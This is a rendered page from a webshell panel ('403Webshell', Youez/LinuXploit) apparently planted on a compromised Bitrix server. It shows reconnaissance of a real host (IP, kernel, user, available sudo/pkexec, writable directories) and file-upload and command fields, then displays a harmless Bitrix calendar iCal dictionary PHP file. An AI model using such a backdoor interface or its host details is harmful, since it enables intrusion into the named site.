403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/ilovecveti.ru/bitrix/modules/calendar/lib/ical/builder/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/ilovecveti.ru/bitrix/modules/calendar/lib/ical/builder/dictionary.php
<?php


namespace Bitrix\Calendar\ICal\Builder;


class Dictionary
{
	public const ATTENDEE_STATUS = [
		'needs_action' => 'NEEDS-ACTION',
		'Q' => 'NEEDS-ACTION',
		'accepted' => 'ACCEPTED',
		'Y' => 'ACCEPTED',
		'H' => 'ACCEPTED',
		'declined' => 'DECLINED',
		'N' => 'DECLINED',
		'tentative' => 'TENTATIVE',
		'delegated' => 'DELEGATED',
	];

	public const ATTENDEE_ROLE = [
		'CHAIR' => 'CHAIR',
		'REQ_PARTICIPANT' => 'REQ-PARTICIPANT',
		'OPT_PARTICIPANT' => 'OPT-PARTICIPANT',
		'NON_PARTICIPANT' => 'NON-PARTICIPANT',
	];

	public const TRANSPARENT =[
		'free' => 'TRANSPARENT',
		'busy' => 'OPAQUE',
		'absent' => 'OPAQUE',
		'quest' => 'OPAQUE',
	];

	public const EVENT_STATUS = [
		'tentative' => 'TENTATIVE',
		'confirmed' => 'CONFIRMED',
		'cancelled' => 'CANCELLED',
	];

	public const ATTENDEE_CUTYPE = [
		'individual' => 'INDIVIDUAL',
		'group' => 'GROUP',
		'resource' => 'RESOURCE',
		'room' => 'ROOM',
		'unknown' => 'UNKNOWN',
		'xname' => 'x-name',
		'iana-token' => 'iana-token',
	];
}

Youez - 2016 - github.com/yon3zu
LinuXploit